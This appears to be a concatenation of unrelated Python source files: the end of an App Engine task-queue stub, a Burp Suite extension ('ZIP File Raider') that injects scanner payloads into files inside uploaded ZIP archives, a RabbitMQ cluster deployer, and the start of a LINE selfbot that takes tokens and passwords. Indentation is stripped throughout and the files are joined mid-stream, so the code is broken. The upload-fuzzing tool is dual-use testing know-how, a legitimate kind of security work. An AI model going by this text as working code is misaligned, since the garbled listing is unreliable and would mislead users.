Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
Raises:
InvalidQueueModeError: If target queue is not a pull queue.
"""
self._GetGroup().QueryAndOwnTasks_Rpc(request, response)
def _Dynamic_ModifyTaskLease(self, request, response):
"""Local implementation of TaskQueueService.ModifyTaskLease.
Args:
request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest.
response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse.
Raises:
InvalidQueueModeError: If target queue is not a pull queue.
"""
self._GetGroup().ModifyTaskLease_Rpc(request, response)
def get_filtered_tasks(self, url=None, name=None, queue_names=None):
"""Get the tasks in the task queue with filters.
Args:
url: A URL that all returned tasks should point at.
name: The name of all returned tasks.
      queue_names: A list of queue names to retrieve tasks from. If left blank
        this defaults to all available queues.
Returns:
A list of taskqueue.Task objects.
"""
all_queue_names = [queue['name'] for queue in self.GetQueues()]
if isinstance(queue_names, basestring):
queue_names = [queue_names]
if queue_names is None:
queue_names = all_queue_names
task_dicts = []
for queue_name in queue_names:
if queue_name in all_queue_names:
for task in self.GetTasks(queue_name):
if url is not None and task['url'] != url:
continue
if name is not None and task['name'] != name:
continue
task_dicts.append(task)
tasks = []
for task in task_dicts:
payload = base64.b64decode(task['body'])
headers = dict(task['headers'])
headers['Content-Length'] = str(len(payload))
eta = datetime.datetime.strptime(task['eta'], '%Y/%m/%d %H:%M:%S')
eta = eta.replace(tzinfo=taskqueue._UTC)
task_object = taskqueue.Task(name=task['name'], method=task['method'],
url=task['url'], headers=headers,
payload=payload, eta=eta)
tasks.append(task_object)
return tasks
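# Hedged illustration (added for clarity, not part of the original stub): how
# the console-facing helpers above might be exercised against an already
# constructed and populated TaskQueueServiceStub. The function and variable
# names below are hypothetical.
def _example_inspect_stub(stub):
  """Prints the stub's queues and a filtered view of the default queue's tasks."""
  for queue in stub.GetQueues():
    # Each entry is a dict shaped as documented in GetQueues().
    print '%s: %s task(s)' % (queue['name'], queue.get('tasks_in_queue'))
  # get_filtered_tasks converts the GetTasks() dicts into taskqueue.Task objects.
  for task in stub.get_filtered_tasks(queue_names=['default']):
    print task.name, task.url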
|
ZIPFileRaider.py
|
# encoding: utf-8
from burp import IBurpExtender
from burp import IHttpListener
from burp import ITab
from burp import IContextMenuFactory
from burp import IParameter
from StringIO import StringIO
from zipfile import ZipFile
from shutil import rmtree, make_archive, copytree, copy
from java.awt import GridLayout, Component, Color
from java.util import ArrayList
from javax.swing import JSplitPane, JTabbedPane, JButton, JPanel, JLabel, JTextArea, JList, BoxLayout, DefaultListModel, JScrollPane, JMenuItem, JTextField, JCheckBox
from jarray import array
from javax.swing.text import DefaultHighlighter
from time import sleep
import base64
import os
import threading
EXTENDER_FLAG = "zipFileRaiderFl4g"
ZIP_NAME = "myZip"
SCAN_ZIP_NAME = "myScanZip"
TEMP_PATH = "zipFileRaider" + os.sep + "tmp"
SCAN_TEMP_PATH = "zipFileRaider" + os.sep + "scan_tmp"
RUNNING_SCAN_PATH = "zipFileRaider" + os.sep + "running_scan_tmp"
INSETION_POINT_SYMBOL = u"§inserti0nP0int§"
PAYLOAD_PARAM_NAME = "extenderPayl0ad%d"
PAYLOAD_FILENAME = "extenderPayl0ad_filename"
class BurpExtender(IBurpExtender, IHttpListener, ITab, IContextMenuFactory):
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
self.isLock = False
self.magicParam = None
self.scanMagicParam = None
self.scanMessageInfo = None
self.repeaterMessageInfo = None
self.currentScanItem = None
self.scanInsertionPoint = {}
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
self._callbacks = callbacks
# set our extension name
callbacks.setExtensionName("ZIP File Raider")
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
# register context menu
callbacks.registerContextMenuFactory(self)
self.initGUI()
callbacks.addSuiteTab(self)
print "[+]Init burp extender"
## implement IContextMenuFactory
def createMenuItems(self, invocation):
#get only selected message
self.messageInfo = invocation.getSelectedMessages()[0]
menuItemList = ArrayList()
menuItemList.add(JMenuItem("Send request to ZIP File Raider extender Repeater", actionPerformed = self.contextRepeaterClick))
menuItemList.add(JMenuItem("Send request to ZIP File Raider extender Scanner", actionPerformed = self.contextScannerClick))
return menuItemList
def contextRepeaterClick(self, event):
self.sendRequestToExtender("Repeater")
def contextScannerClick(self, event):
self.sendRequestToExtender("Scanner")
def sendRequestToExtender(self, tab):
#get filename
zipfilename = "Archive(default_name).zip"
filenameParam = self._helpers.getRequestParameter(self.messageInfo.getRequest(), "filename")
if filenameParam == None:
print "This request is not contain upload file"
return
if filenameParam.getType() == IParameter.PARAM_MULTIPART_ATTR:
zipfilename = filenameParam.getValue()
#get magicparam
requestString = self._helpers.bytesToString(self.messageInfo.getRequest())
magicParamStart, magicParamEnd = None, None
initialIndex = filenameParam.getValueStart() - 12
for i in range(initialIndex, 0 , -1):
if requestString[i] == '"' :
if magicParamEnd == None:
magicParamEnd = i
elif requestString[i-6:i] == " name=":
magicParamStart = i + 1
break
if magicParamStart == None:
print "[-]Cannot detect file parameter name"
return
else:
magicparam = requestString[magicParamStart:magicParamEnd]
dataParameter = self._helpers.getRequestParameter(self.messageInfo.getRequest(), magicparam)
#Check is zip upload or not
if not dataParameter is None:
value = dataParameter.getValue()
if tab == "Repeater":
self.repeaterMessageInfo = self.messageInfo
self.extractZipFile(value, TEMP_PATH)
self.showListFileDir(TEMP_PATH)
self.repeaterZipFilename = zipfilename
self.magicParam = magicparam
else:
self.removeDirectory(RUNNING_SCAN_PATH)
self.scanTemplateFileName = []
self.insertionPointCount = 0
self.scanMessageInfo = self.messageInfo
self.extractZipFile(value, SCAN_TEMP_PATH)
self.showScanListFileDir(SCAN_TEMP_PATH)
self.scanZipFilename = zipfilename
self.scanMagicParam = magicparam
else:
print "no data param"
## implement IHttpListener
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# only process requests
if not messageIsRequest:
return
extenderFlag = self._helpers.getRequestParameter(messageInfo.getRequest(), EXTENDER_FLAG)
if not extenderFlag is None:
while self.isLock:
sleep(0.5)
# print "sleep"
pass
self.isLock = True
payloads = []
for i in range(0, self.insertionPointCount):
paramData = self._helpers.getRequestParameter(messageInfo.getRequest(), PAYLOAD_PARAM_NAME % i)
try:
payloads.append(paramData.getValue())
except Exception as e :
payloads.append("")
payloadsIndex = 0
for template in self.scanTemplateFileName:
newFileContent = ""
fileContentString = self._helpers.bytesToString(self.runningScanTemplate[template])
contentStrings = fileContentString.split(INSETION_POINT_SYMBOL)
for i, s in enumerate(contentStrings):
newFileContent += s
if i == len(contentStrings) - 1:
break
else:
newFileContent += payloads[payloadsIndex]
payloadsIndex += 1
newFileContent = self._helpers.stringToBytes(newFileContent)
try:
self.writeFile(RUNNING_SCAN_PATH + os.sep + template, newFileContent)
except Exception as e :
print "Error1 %s" % e
# ZipAndGo
try:
self.compressToZip(SCAN_ZIP_NAME, RUNNING_SCAN_PATH + os.sep + SCAN_TEMP_PATH)
zipContent = self.readFile(SCAN_ZIP_NAME + ".zip")
newRequest = self._helpers.updateParameter(messageInfo.getRequest(), self._helpers.buildParameter(self.scanMagicParam, zipContent, IParameter.PARAM_BODY))
# add filename
if self.isScanZipFilename:
filenamePayload = self._helpers.getRequestParameter(messageInfo.getRequest(), PAYLOAD_FILENAME).getValue()
newRequest = self.addMultipartFilenameParam(filenamePayload ,newRequest, self.scanMagicParam)
newRequest = self._helpers.removeParameter(newRequest, self._helpers.buildParameter(PAYLOAD_FILENAME, "none", IParameter.PARAM_BODY))
else:
newRequest = self.addMultipartFilenameParam(self.scanZipFilename ,newRequest, self.scanMagicParam)
#remove unnecessary param
for i in range(0, self.insertionPointCount):
newRequest = self._helpers.removeParameter(newRequest, self._helpers.buildParameter(PAYLOAD_PARAM_NAME%i, "none", IParameter.PARAM_BODY))
newRequest = self._helpers.removeParameter(newRequest, self._helpers.buildParameter(EXTENDER_FLAG, "none", IParameter.PARAM_BODY))
# set to newRequest
messageInfo.setRequest(newRequest)
except Exception as e :
print "Error2 %s" % e
# print "[+]request sent"
self.isLock = False
return
else:
# not from our extender
return
def extractZipFile(self, data, des_path):
b = base64.b64encode(data)
zipfile = ZipFile(StringIO(base64.b64decode(b)))
# remove tmp folder
self.removeDirectory(des_path)
zipfile.extractall(des_path)
print "[*]extract done"
    def compressToZip(self, zipName, zipDirPath):
        make_archive(zipName, "zip", zipDirPath)
return
def removeDirectory(self, rm_path):
if not os.path.exists(rm_path):
return
try:
rmtree(rm_path)
except Exception as e :
print "[-]Error while remove %s folder %s" % (rm_path, e)
def showListFileDir(self, mypath):
self.filename = []
self.fileDirList = []
self.absFilePath = {}
for root, dirs, files in os.walk(mypath):
path = root.split(os.sep)
fname = os.path.basename(root)
dirPath = (len(path) - 3) * "---" + fname
self.fileDirList.append(dirPath)
self.filename.append(fname)
for file in files:
filePath = (len(path)-2) * "---" + file
self.fileDirList.append(filePath)
self.filename.append(file)
self.absFilePath[filePath] = root + os.sep + file
self.fileDirList.remove(TEMP_PATH.split(os.sep)[1])
self.filename.remove(TEMP_PATH.split(os.sep)[1])
self.dirList.setListData(self.fileDirList)
def showScanListFileDir(self, mypath):
self.scanFilename = []
self.scanFileDirList = []
self.scanAbsFilePath = {}
for root, dirs, files in os.walk(mypath):
path = root.split(os.sep)
fname = os.path.basename(root)
dirPath = (len(path) - 3) * "---" + fname
self.scanFileDirList.append(dirPath)
self.scanFilename.append(fname)
for file in files:
filePath = (len(path)-2) * "---" + file
self.scanFileDirList.append(filePath)
self.scanFilename.append(file)
self.scanAbsFilePath[filePath] = root + os.sep + file
self.scanFileDirList.remove(SCAN_TEMP_PATH.split(os.sep)[1])
self.scanFilename.remove(SCAN_TEMP_PATH.split(os.sep)[1])
self.scanDirList.setListData(self.scanFileDirList)
def listSelect(self, event):
index = self.dirList.selectedIndex
key = self.fileDirList[index]
self.lblFilename.text = self.filename[index]
if key in self.absFilePath:
self.editField.setMessage(self.readFile(self.absFilePath[key]), False)
else:
#dir
self.editField.setMessage("/*Directory*/", False)
def scanListSelect(self, event):
index = self.scanDirList.selectedIndex
key = self.scanFileDirList[index]
self.scanLblFilename.text = self.scanFilename[index]
if key in self.scanAbsFilePath:
#file
if self.scanAbsFilePath[key] in self.scanTemplateFileName:
content = self.readFile(self.scanAbsFilePath[key])
for idx, el in enumerate(self.scanInsertionPoint[self.scanAbsFilePath[key]]):
# print el
content = self.setInsertionMark(content, el[0] + idx*2, el[1] + idx*2)
self.scanEditField.setMessage(content, False)
else:
self.scanEditField.setMessage(self.readFile(self.scanAbsFilePath[key]), False)
else:
#dir
self.scanEditField.setMessage("/*Directory*/", False)
def readFile(self, path):
file = open(path, "rb")
fileContent = file.read()
file.close()
return fileContent
def writeFile(self, path, content):
file = open(path, "wb")
file.write(content)
file.close()
def updateContentLength(self, request):
request = self._helpers.addParameter(request, self._helpers.buildParameter("dump", "none", IParameter.PARAM_BODY))
request = self._helpers.removeParameter(request, self._helpers.buildParameter("dump", "none", IParameter.PARAM_BODY))
return request
def addMultipartFilenameParam(self, zipfilename, request, magicparam):
dataParameter = self._helpers.getRequestParameter(request, magicparam)
getFilenameOffset = dataParameter.getNameEnd() + 1
filename = '; filename="%s"' % zipfilename
try:
requestString = self._helpers.bytesToString(request)
requestString = requestString[:getFilenameOffset] + filename + requestString[getFilenameOffset:]
request = self._helpers.stringToBytes(requestString)
request = self.updateContentLength(request)
return request
except Exception as e :
print(e)
return
def makeRequest(self, zipContent):
print "[+]thread is running (making request)"
request = self.repeaterMessageInfo.getRequest()
request = self._helpers.updateParameter(request, self._helpers.buildParameter(self.magicParam, zipContent, IParameter.PARAM_BODY))
# add filename
request = self.addMultipartFilenameParam(self.repeaterZipFilename ,request, self.magicParam)
# sending request
result = self._callbacks.makeHttpRequest(self.repeaterMessageInfo.getHttpService(), request)
self.requestPanel.setMessage(result.getRequest(), True)
try:
self.responsePanel.setMessage(result.getResponse(), False)
except Exception as e :
self.responsePanel.setMessage("An error occured", False)
print "[+]done"
def btnGoClick(self, event):
if self.repeaterMessageInfo == None:
return
self.saveEditFile()
self.compressToZip(ZIP_NAME, TEMP_PATH)
zipContent = self.readFile(ZIP_NAME + ".zip")
t1 = threading.Thread(target=self.makeRequest, args=[zipContent])
t1.start()
# print "[+]thread start"
def saveEditFile(self):
if self.repeaterMessageInfo == None:
return
index = self.dirList.selectedIndex
key = self.fileDirList[index]
if key in self.absFilePath:
#file
content = self.editField.getMessage()
self.writeFile(self.absFilePath[key], content)
def btnSaveClick(self, event):
self.saveEditFile()
def btnClearClick(self, event):
self.dirList.setListData([])
self.editField.setMessage("", False)
self.lblFilename.text = "File name"
self.requestPanel.setMessage("", True)
self.responsePanel.setMessage("", False)
self.repeaterMessageInfo = None
self.removeDirectory(TEMP_PATH)
def btnResetRepeaterClick(self, event):
print "btnClick"
if self.repeaterMessageInfo == None:
print "return"
return
dataParameter = self._helpers.getRequestParameter(self.repeaterMessageInfo.getRequest(), self.magicParam)
value = dataParameter.getValue()
# print value
self.extractZipFile(value, TEMP_PATH)
# self.sendRequestToExtender("Repeater")
self.listSelect(event)
def scanBtnClearClick(self, event):
self.scanTemplateFileName = []
self.scanInsertionPoint = {}
self.insertionPointCount = 0
self.scanDirList.setListData([])
self.scanEditField.setMessage("", False)
self.scanLblFilename.text = "File name"
self.scanMessageInfo = None
self.removeDirectory(SCAN_TEMP_PATH)
self.removeDirectory(RUNNING_SCAN_PATH)
def scanBtnClearInsClick(self, event):
self.scanTemplateFileName = []
self.scanInsertionPoint = {}
self.insertionPointCount = 0
self.removeDirectory(RUNNING_SCAN_PATH)
self.scanListSelect(event)
def addInsertionPoint(self, insStart, insEnd):
index = self.scanDirList.selectedIndex
key = self.scanFileDirList[index]
if key in self.scanAbsFilePath:
#file
if not self.scanAbsFilePath[key] in self.scanTemplateFileName:
self.scanTemplateFileName.append(self.scanAbsFilePath[key])
self.scanInsertionPoint[self.scanAbsFilePath[key]] = [[insStart, insEnd]]
else:
offset = len(self.scanInsertionPoint[self.scanAbsFilePath[key]]) * 2
self.scanInsertionPoint[self.scanAbsFilePath[key]].append([insStart - offset, insEnd - offset])
def btnSetInsertionPointClick(self, event):
if self.scanMessageInfo == None:
return
# show in UI
insertionPointChar = u"§"
selectedText = self.scanEditField.getSelectedData()
if selectedText == None:
print "[-]No selected area"
return
start = self.scanEditField.getSelectionBounds()[0]
end = start + len(selectedText)
requestString = self.scanEditField.getMessage()
newRequestString = self.setInsertionMark(requestString, start, end)
self.scanEditField.setMessage(newRequestString, False)
#save insertion point
self.addInsertionPoint(start, end)
self.insertionPointCount += 1
def setInsertionMark(self, requestString, start, end):
insertionPointChar = u"§"
selectedText = requestString[start:end]
newRequestString = self._helpers.bytesToString(requestString[:start]) + insertionPointChar + self._helpers.bytesToString(selectedText) + insertionPointChar + self._helpers.bytesToString(requestString[end:])
newRequestString = self._helpers.stringToBytes(newRequestString)
return newRequestString
def prepareScanRequest(self, request):
for i in range(0, self.insertionPointCount):
param = self._helpers.buildParameter(PAYLOAD_PARAM_NAME % i, self.runningScanDefaultPayload[i], IParameter.PARAM_BODY)
request = self._helpers.addParameter(request, param)
# add flag
param = self._helpers.buildParameter(EXTENDER_FLAG, "1", IParameter.PARAM_BODY)
request = self._helpers.addParameter(request, param)
# add filename scan
if self.checkboxScanFilename.isSelected():
self.isScanZipFilename = True
param = self._helpers.buildParameter(PAYLOAD_FILENAME, self.scanZipFilename, IParameter.PARAM_BODY)
request = self._helpers.addParameter(request, param)
else:
self.isScanZipFilename = False
return request
def prepareScanInsertionOffset(self, request, paramName):
param = self._helpers.getRequestParameter(request, paramName)
startOffset = param.getValueStart()
endOffset = param.getValueEnd()
return array([startOffset, endOffset], 'i')
def btnScanClick(self, event):
if self.scanMessageInfo == None:
return
self.runningScanTemplate = {}
self.runningScanDefaultPayload = []
self.removeDirectory(RUNNING_SCAN_PATH)
os.makedirs(RUNNING_SCAN_PATH)
copytree(SCAN_TEMP_PATH, RUNNING_SCAN_PATH + os.sep + SCAN_TEMP_PATH)
# self.insertionPointCount = 3
insertionPointNo = 0
# read template
for template in self.scanTemplateFileName:
t = self._helpers.bytesToString(self.readFile(template))
temp = ""
insertionPointNoOfFile = 0
# point to begin of file
insPoint = []
for el in self.scanInsertionPoint[template]:
insPoint.append(el[0])
insPoint.append(el[1])
insPoint.sort()
currentPoint = 0
for i in xrange(0, len(insPoint) - 1, 2):
# print p
temp += t[currentPoint:insPoint[i]] + INSETION_POINT_SYMBOL
currentPoint = insPoint[i + 1]
self.runningScanDefaultPayload.append(t[insPoint[i]:insPoint[i + 1]])
insertionPointNo += 1
temp += t[currentPoint:]
temp = self._helpers.stringToBytes(temp)
self.runningScanTemplate[template] = temp
if insertionPointNo != self.insertionPointCount:
print "[-]Error while parsing template"
return
#send to scanner
httpService = self.scanMessageInfo.getHttpService()
# request = self.scanMessageInfo.getRequest()
request = self.prepareScanRequest(self.scanMessageInfo.getRequest())
isHttps = True if httpService.getProtocol() == 'https' else False
insertionOffset = []
for i in range(0, self.insertionPointCount):
insertionOffset.append(self.prepareScanInsertionOffset(request,PAYLOAD_PARAM_NAME % i))
if self.isScanZipFilename:
insertionOffset.append(self.prepareScanInsertionOffset(request,PAYLOAD_FILENAME))
self.currentScanItem = self._callbacks.doActiveScan(httpService.getHost(), httpService.getPort(), isHttps, request, insertionOffset)
print "[*]Scanner is running"
self._callbacks.issueAlert("Send to Active Scanner")
t = threading.Thread(target=self.checkScannerStatus)
t.start()
def checkScannerStatus(self):
self.disableScanUi()
while True:
if self.currentScanItem == None:
self.scannerStatusLabel.text = "<html><i style='color:grey'> Canceled</i></html>"
self.enableScanUi()
return
else:
status = self.currentScanItem.getStatus()
if status == "finished":
self.scannerStatusLabel.text = "<html><i style='color:green'> Complete</i></html>"
self.enableScanUi()
self._callbacks.issueAlert("Scan Complete")
return
self.scannerStatusLabel.text = "<html><i style='color:orange'> %s</i></html>" % (status)
#schedule run every 1 sec
sleep(1)
def cancelScan(self, event):
self.currentScanItem.cancel()
self.currentScanItem = None
self.enableScanUi()
def disableScanUi(self):
self.scanBtnCancel.setEnabled(True)
self.scanBtnGo.setEnabled(False)
self.scanBtnSave.setEnabled(False)
self.scanBtnClearInsertionPoint.setEnabled(False)
self.scanBtnClear.setEnabled(False)
self.scanDirList.setEnabled(False)
def enableScanUi(self):
self.scanBtnCancel.setEnabled(False)
self.scanBtnGo.setEnabled(True)
self.scanBtnSave.setEnabled(True)
self.scanBtnClearInsertionPoint.setEnabled(True)
self.scanBtnClear.setEnabled(True)
self.scanEditField.setMessage("", False)
self.scanDirList.setEnabled(True)
#init extender GUI
def initGUI(self):
#
# Manual tab
#
tabPane = JTabbedPane(JTabbedPane.TOP)
reqRestabPane = JTabbedPane(JTabbedPane.TOP)
splitPane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
tabPane.addTab("Repeater", splitPane)
splitPane2 = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
splitPane.setLeftComponent(splitPane2)
panel1 = JPanel()
panel2 = JPanel()
splitPane2.setLeftComponent(panel1)
splitPane2.setRightComponent(panel2)
splitPane.setRightComponent(reqRestabPane)
panel1.setLayout(BoxLayout(panel1,BoxLayout.Y_AXIS))
panel2.setLayout(BoxLayout(panel2,BoxLayout.Y_AXIS))
self.requestPanel = self._callbacks.createMessageEditor(None, False)
self.responsePanel = self._callbacks.createMessageEditor(None, False)
label1 = JLabel("files and folders")
self.lblFilename = JLabel("File name")
label3 = JLabel("Response")
self.editField = self._callbacks.createMessageEditor(None, True)
self.dirList = JList([], valueChanged = self.listSelect)
listFileDirPane = JScrollPane(self.dirList)
## Set left align
listFileDirPane.setAlignmentX(Component.LEFT_ALIGNMENT)
btnPanel = JPanel()
btnGo = JButton("Compress & Go", actionPerformed = self.btnGoClick)
btnSave = JButton("Save", actionPerformed = self.btnSaveClick)
btnClear = JButton("Clear", actionPerformed = self.btnClearClick)
btnReset = JButton("Reset", actionPerformed = self.btnResetRepeaterClick)
btnPanel.add(btnGo)
btnPanel.add(btnSave)
btnPanel.add(btnReset)
btnPanel.add(btnClear)
btnPanel.setLayout(BoxLayout(btnPanel,BoxLayout.X_AXIS))
panel1.add(label1)
panel1.add(listFileDirPane)
panel2.add(self.lblFilename)
panel2.add(self.editField.getComponent())
panel2.add(btnPanel)
reqRestabPane.addTab("Response",self.responsePanel.getComponent())
reqRestabPane.addTab("Request",self.requestPanel.getComponent())
splitPane.setResizeWeight(0.6)
#
# Scanner tab
#
scanSplitPane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
tabPane.addTab("Scanner", scanSplitPane)
scanSplitPane2 = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
scanSplitPane.setLeftComponent(scanSplitPane2)
scanPanel1 = JPanel()
scanPanel2 = JPanel()
scanPanel3 = JPanel()
scanSplitPane2.setLeftComponent(scanPanel1)
scanSplitPane2.setRightComponent(scanPanel2)
scanSplitPane.setRightComponent(scanPanel3)
scanPanel1.setLayout(BoxLayout(scanPanel1,BoxLayout.Y_AXIS))
scanPanel2.setLayout(BoxLayout(scanPanel2,BoxLayout.Y_AXIS))
scanPanel3.setLayout(BoxLayout(scanPanel3,BoxLayout.Y_AXIS))
scanLabel1 = JLabel("files and folders")
self.scanLblFilename = JLabel("File name")
scanLabel3 = JLabel("<html><h3>Config scanner</h3></html>")
scanLabel4 = JLabel("<html><h3>Scanner status</h3></html>")
scanLabel5 = JLabel("""<html>
<div>
<h3>Notice</h3>
<ul>
        <li>Only one scan can run at a time</li>
        <li>Works with .zip files only</li>
        <li>Scans cannot be resumed after exiting Burp</li>
</ul>
</div>
</html>""")
self.scannerStatusLabel = JLabel("<html><i style='color:grey'> Not Running</i></html>")
        self.checkboxScanFilename = JCheckBox("Also scan zip filename (this may upload several files to the server)")
self.scanEditField = self._callbacks.createMessageEditor(None, False)
self.scanDirList = JList([], valueChanged = self.scanListSelect)
scanListFileDirPane = JScrollPane(self.scanDirList)
## Set left align
scanListFileDirPane.setAlignmentX(Component.LEFT_ALIGNMENT)
scanBtnPanel = JPanel()
self.scanBtnGo = JButton("Set insertion point", actionPerformed = self.btnSetInsertionPointClick)
self.scanBtnSave = JButton("Send to scanner", actionPerformed = self.btnScanClick)
self.scanBtnClearInsertionPoint = JButton("Clear insertion points", actionPerformed = self.scanBtnClearInsClick)
self.scanBtnClear = JButton("Clear", actionPerformed = self.scanBtnClearClick)
self.scanBtnCancel = JButton("Cancel", actionPerformed = self.cancelScan)
scanBtnPanel.add(self.scanBtnGo)
scanBtnPanel.add(self.scanBtnSave)
scanBtnPanel.add(self.scanBtnClearInsertionPoint)
scanBtnPanel.add(self.scanBtnClear)
scanBtnPanel.setLayout(BoxLayout(scanBtnPanel,BoxLayout.X_AXIS))
scanPanel1.add(scanLabel1)
scanPanel1.add(scanListFileDirPane)
scanPanel2.add(self.scanLblFilename)
scanPanel2.add(self.scanEditField.getComponent())
scanPanel2.add(scanBtnPanel)
scanPanel3.add(scanLabel3)
scanPanel3.add(self.checkboxScanFilename)
scanPanel3.add(scanLabel4)
scanPanel3.add(self.scannerStatusLabel)
scanPanel3.add(self.scanBtnCancel)
self.scanBtnCancel.setEnabled(False)
scanPanel3.add(scanLabel5)
scanSplitPane.setResizeWeight(0.6)
self.tab = tabPane
# implement ITab
def getTabCaption(self):
return "ZIP File Raider"
def getUiComponent(self):
return self.tab
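# Hedged illustration (not part of the extension): the template/payload
# substitution that processHttpMessage performs on each scan template, reduced
# to a plain function. The function name and arguments are hypothetical.
def _example_apply_payloads(template, payloads, marker=INSETION_POINT_SYMBOL):
    """Rebuilds a file body by replacing each marker with the next payload in order."""
    pieces = template.split(marker)
    rebuilt = []
    for i, piece in enumerate(pieces):
        rebuilt.append(piece)
        if i < len(pieces) - 1:
            # A marker sat between piece i and piece i+1.
            rebuilt.append(payloads[i])
    return u"".join(rebuilt)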
|
Deployer.py
|
import sys
import subprocess
import threading
import time
import uuid
import os.path
from datetime import datetime
from random import randint
from UniqueConfiguration import UniqueConfiguration
from CommonConfiguration import CommonConfiguration
from printer import console_out, console_out_exception
class Deployer:
def __init__(self):
self._deploy_status = dict()
self.actor = "DEPLOYER"
def deploy(self, runner, configurations, common_conf):
if common_conf.run_tag == "none":
common_conf.run_tag = str(randint(1, 99999))
self.parallel_deploy(configurations, common_conf)
# if common_conf.background_topology_file != "none":
# runner.run_background_load_across_runs(configurations, common_conf)
def get_deploy_status(self):
return self._deploy_status
def update_single(self, unique_conf, common_conf):
raise NotImplementedError
def deploy_single(self, unique_conf, common_conf):
raise NotImplementedError
def deploy_rabbitmq_cluster(self, unique_conf, common_conf):
raise NotImplementedError
def teardown_ec2(self, technology, node, run_tag, no_destroy):
raise NotImplementedError
def teardown_managed_k8s(self, unique_conf, no_destroy):
raise NotImplementedError
def teardown_loadgen(self, unique_conf, common_conf, no_destroy):
pass
def teardown_all(self, configurations, common_conf, no_destroy):
if no_destroy:
console_out(self.actor, "No teardown as --no-destroy set to true")
self.get_logs_of_all_configs(common_conf, configurations)
else:
console_out(self.actor, "Terminating all servers")
self.get_logs_of_all_configs(common_conf, configurations)
for config_tag in configurations:
console_out(self.actor, f"TEARDOWN FOR configuration {config_tag}")
unique_conf_list = configurations[config_tag]
for p in range(len(unique_conf_list)):
unique_conf = unique_conf_list[p]
if unique_conf.deployment == "ec2":
for n in range(0, unique_conf.cluster_size):
node_num = int(unique_conf.node_number) + n
console_out(self.actor, f"TEARDOWN FOR node {node_num}")
self.teardown_ec2(unique_conf.technology,
str(node_num),
common_conf.run_tag,
no_destroy)
console_out(self.actor, f"TEARDOWN FOR {unique_conf.config_tag} loadgen")
self.teardown_loadgen(unique_conf,
common_conf,
no_destroy)
elif unique_conf.deployment == "eks" or unique_conf.deployment == "gke":
self.teardown_managed_k8s(unique_conf, no_destroy)
else:
raise Exception(f"Invalid deployment type: {unique_conf.deployment}")
console_out(self.actor, "All servers terminated")
exit(1)
def get_start_end_nodes(self, configurations):
start_node = 0
last_node = 0
counter = 0
for config_tag in configurations:
unique_conf_list = configurations[config_tag]
for p in range(len(unique_conf_list)):
unique_conf = unique_conf_list[p]
if counter == 0:
start_node = unique_conf.node_number
last_node = int(unique_conf.node_number) + int(unique_conf.cluster_size) - 1
counter += 1
return start_node, last_node
def get_start_end_nodes_of_config(self, unique_conf):
start_node = unique_conf.node_number
last_node = int(unique_conf.node_number) + int(unique_conf.cluster_size) - 1
return start_node, last_node
def parallel_deploy(self, configurations, common_conf):
d_threads = list()
for config_tag in configurations:
unique_conf_list = configurations[config_tag]
for i in range(len(unique_conf_list)):
unique_conf = unique_conf_list[i]
if common_conf.no_deploy:
deploy = threading.Thread(target=self.update_single, args=(unique_conf, common_conf,))
else:
deploy = threading.Thread(target=self.deploy_rabbitmq_cluster, args=(unique_conf, common_conf,))
d_threads.append(deploy)
for dt in d_threads:
dt.start()
for dt in d_threads:
dt.join()
for config_tag in configurations:
unique_conf_list = configurations[config_tag]
for p in range(len(unique_conf_list)):
unique_conf = unique_conf_list[p]
status_id1 = unique_conf.technology + unique_conf.node_number
if self._deploy_status[status_id1] != "success":
console_out(self.actor, f"Deployment failed for node {unique_conf.technology}{unique_conf.node_number}")
if not common_conf.no_deploy:
self.teardown_all(configurations, common_conf, False)
def get_logs_of_all_configs(self, common_conf, configurations):
for config_tag in configurations:
unique_conf_list = configurations[config_tag]
for p in range(len(unique_conf_list)):
unique_conf = unique_conf_list[p]
if unique_conf.deployment == "ec2":
try:
start_node, end_node = self.get_start_end_nodes_of_config(unique_conf)
self.get_logs(common_conf, unique_conf.logs_volume, start_node, end_node)
except Exception as e:
console_out_exception(self.actor, "Failed retrieving logs", e)
elif unique_conf.deployment == "eks" or unique_conf.deployment == "gke":
console_out(self.actor, "Log gathering not yet supported for EKS/GKE")
else:
raise Exception(f"Invalid deployment type: {unique_conf.deployment}")
def get_logs(self, common_conf, logs_volume, start_node, end_node):
raise NotImplementedError
def update_broker_config_on_all(self, configurations, common_conf, broker_config):
for config_tag in configurations:
unique_conf_list = configurations[config_tag]
for p in range(len(unique_conf_list)):
unique_conf = unique_conf_list[p]
start_node, end_node = self.get_start_end_nodes_of_config(unique_conf)
self.update_broker_config(common_conf, start_node, end_node, broker_config)
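# Hedged illustration (not part of the original module): a minimal concrete
# subclass showing which hooks parallel_deploy expects a real deployer to
# provide. The class name and method bodies are hypothetical placeholders, not
# the project's actual EC2/EKS/GKE implementations.
class ExampleNoopDeployer(Deployer):
    def update_single(self, unique_conf, common_conf):
        # parallel_deploy checks this status key after its threads join.
        console_out(self.actor, f"would update {unique_conf.config_tag}")
        self._deploy_status[unique_conf.technology + unique_conf.node_number] = "success"
    def deploy_rabbitmq_cluster(self, unique_conf, common_conf):
        console_out(self.actor, f"would deploy a cluster for {unique_conf.config_tag}")
        self._deploy_status[unique_conf.technology + unique_conf.node_number] = "success"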
|
gg.py
|
# -*- coding: utf-8 -*-
'''
© 2018SelfBot ProtectV2.2
'''
from important import *
# Setup Argparse
parser = argparse.ArgumentParser(description='© 2018SelfBot ProtectV2.2')
parser.add_argument('-t', '--token', type=str, metavar='', required=False, help='Token | Example : Exxxx')
parser.add_argument('-e', '--email', type=str, default='', metavar='', required=False, help='Email Address | Example : example@xxx.xx')
parser.add_argument('-p', '--passwd', type=str, default='', metavar='', required=False, help='Password | Example : xxxx')
parser.add_argument('-a', '--appName', type=str, default='', metavar='', required=False, choices=list(ApplicationType._NAMES_TO_VALUES), help='Application Type | Example : CHROMEOS')
